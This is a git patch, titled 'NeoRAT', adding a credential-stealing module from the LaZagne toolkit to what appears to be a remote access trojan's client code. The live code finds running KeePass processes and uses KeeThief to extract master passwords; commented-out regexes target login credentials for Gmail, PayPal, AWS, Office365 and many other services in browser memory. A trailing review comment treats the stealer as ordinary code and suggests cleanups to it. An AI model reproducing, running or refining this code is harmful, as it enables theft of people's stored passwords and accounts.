From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/memory/memorydump.py | 117 +++++++++++++++++++++
 1 file changed, 117 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/memory/memorydump.py
(limited to 'foreign/client_handling/lazagne/softwares/memory/memorydump.py')
diff --git a/foreign/client_handling/lazagne/softwares/memory/memorydump.py b/foreign/client_handling/lazagne/softwares/memory/memorydump.py
new file mode 100644
index 0000000..c4a256c
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/memory/memorydump.py
@@ -0,0 +1,117 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Author: Nicolas VERDIER (contact@n1nj4.eu) + +""" +This script uses memorpy to dumps cleartext passwords from browser's memory +It has been tested on both windows 10 and ubuntu 16.04 +The regex have been taken from the mimikittenz https://github.com/putterpanda/mimikittenz +""" + +from .keethief import KeeThief +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.winstructure import get_full_path_from_pid +from foreign.client_handling.lazagne.config.lib.memorpy import * + + +# Memorpy has been removed because it takes to much time to execute - could return one day + +# create a symbolic link on Windows +# mklink /J memorpy ..\..\..\..\external\memorpy\memorpy + +# password_regex=[ +# "(email|log(in)?|user(name)?)=(?P.{1,25})?&.{0,10}?p[a]?[s]?[s]?[w]?[o]?[r]?[d]?=(?P.{1,25})&" +# ] + +# grep to list all URLs (could be useful to find the relation between a user / password and its host) +# http_regex=[ +# "(?Phttp[s]?:\/\/[a-zA-Z0-9-]{1,61}(\.[a-zA-Z]{2,})+)" +# ] + +# password_regex=[ +# ("Gmail","&Email=(?P.{1,99})?&Passwd=(?P.{1,99})?&PersistentCookie="), +# ("Dropbox","login_email=(?P.{1,99})&login_password=(?P.{1,99})&"), +# ("SalesForce","&display=page&username=(?P.{1,32})&pw=(?P.{1,16})&Login="), +# ("Office365","login=(?P.{1,32})&passwd=(?P.{1,22})&PPSX="), +# ("MicrosoftOneDrive","login=(?P.{1,42})&passwd=(?P.{1,22})&type=.{1,2}&PPFT="), +# ("PayPal","login_email=(?P.{1,48})&login_password=(?P.{1,16})&submit=Log\+In&browser_name"), +# ("awsWebServices","&email=(?P.{1,48})&create=.{1,2}&password=(?P.{1,22})&metadata1="), +# ("OutlookWeb","&username=(?P.{1,48})&password=(?P.{1,48})&passwordText"), +# ("Slack","&crumb=.{1,70}&email=(?P.{1,50})&password=(?P.{1,48})"), +# ("CitrixOnline","emailAddress=(?P.{1,50})&password=(?P.{1,50})&submit"), +# ("Xero 
","fragment=&userName=(?P.{1,32})&password=(?P.{1,22})&__RequestVerificationToken="), +# ("MYOB","UserName=(?P.{1,50})&Password=(?P.{1,50})&RememberMe="), +# ("JuniperSSLVPN","tz_offset=-.{1,6}&username=(?P.{1,22})&password=(?P.{1,22})&realm=.{1,22}&btnSubmit="), +# ("Twitter","username_or_email%5D=(?P.{1,42})&session%5Bpassword%5D=(?P.{1,22})&remember_me="), +# ("Facebook","lsd=.{1,10}&email=(?P.{1,42})&pass=(?P.{1,22})&(?:default_)?persistent="), +# ("LinkedIN","session_key=(?P.{1,50})&session_password=(?P.{1,50})&isJsEnabled"), +# ("Malwr","&username=(?P.{1,32})&password=(?P.{1,22})&next="), +# ("VirusTotal","password=(?P.{1,22})&username=(?P.{1,42})&next=%2Fen%2F&response_format=json"), +# ("AnubisLabs","username=(?P.{1,42})&password=(?P.{1,22})&login=login"), +# ("CitrixNetScaler","login=(?P.{1,22})&passwd=(?P.{1,42})"), +# ("RDPWeb","DomainUserName=(?P.{1,52})&UserPass=(?P.{1,42})&MachineType"), +# ("JIRA","username=(?P.{1,50})&password=(?P.{1,50})&rememberMe"), +# ("Redmine","username=(?P.{1,50})&password=(?P.{1,50})&login=Login"), +# ("Github","%3D%3D&login=(?P.{1,50})&password=(?P.{1,50})"), +# ("BugZilla","Bugzilla_login=(?P.{1,50})&Bugzilla_password=(?P.{1,50})"), +# ("Zendesk","user%5Bemail%5D=(?P.{1,50})&user%5Bpassword%5D=(?P.{1,50})"), +# ("Cpanel","user=(?P.{1,50})&pass=(?P.{1,50})"), +# ] + +browser_list = ["iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "MicrosoftEdge.exe", "microsoftedgecp.exe"] +keepass_process = 'keepass.exe' + + +class MemoryDump(ModuleInfo): + def __init__(self): + options = {'command': '-m', 'action': 'store_true', 'dest': 'memory_dump', + 'help': 'retrieve browsers passwords from memory'} + ModuleInfo.__init__(self, 'memory_dump', 'memory', options) + + def run(self): + pwd_found = [] + for process in Process.list(): + # if not memorpy: + # if process.get('name', '').lower() in browser_list: + # # Get only child process + # try: + # p = psutil.Process(process.get('pid')) + # if p.parent(): + # if 
process.get('name', '').lower() != str(p.parent().name().lower()): + # continue + # except: + # continue + # + # try: + # mw = MemWorker(pid=process.get('pid')) + # except ProcessException: + # continue + # + # self.debug(u'dumping passwords from %s (pid: %s) ...' % (process.get('name', ''), + # str(process.get('pid', '')))) + # for _, x in mw.mem_search(password_regex, ftype='groups'): + # login, password = x[-2:] + # pwd_found.append( + # { + # 'URL' : 'Unknown', + # 'Login' : login, + # 'Password' : password + # } + # ) + + if keepass_process in process.get('name', '').lower(): + full_exe_path = get_full_path_from_pid(process.get('pid')) + k = KeeThief() + if k.run(full_exe_path=full_exe_path): + for keepass in constant.keepass: + data = keepass.get('KcpPassword', None) + if data: + pwd_found.append({ + 'Category': 'KeePass', + 'KeyType': data['KeyType'], + 'Login': data['Database'], + 'Password': data['Password'] + }) + + return pwd_found -- cgit v1.2.3
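Review bot: The module docstring, the `-m` option's help text ('retrieve browsers passwords from memory') and `browser_list` all describe the memorpy browser-scanning path, but inside `run()` that entire branch is commented out and only the KeePass/KeeThief branch executes, so the documentation no longer describes what the module does. The header comment also states that memorpy has been removed, yet `from foreign.client_handling.lazagne.config.lib.memorpy import *` is kept and appears to be what supplies `Process` for `Process.list()`; replacing the wildcard with an explicit `from foreign.client_handling.lazagne.config.lib.memorpy import Process` (assuming that is where the name comes from) makes the remaining dependency visible and the contradiction with the comment obvious. The docstring and help string should be reworded to state that only the KeePass case is handled, and `browser_list` either dropped or annotated as retained for a possible future re-enable rather than left as an unreferenced constant. In the KeePass loop, `data['KeyType']`, `data['Database']` and `data['Password']` are indexed directly, so a `KcpPassword` entry missing any of those keys would end the whole iteration with a KeyError instead of skipping that entry; whether KeeThief can produce such an entry has to be confirmed against `keethief.py`, which is outside this diff.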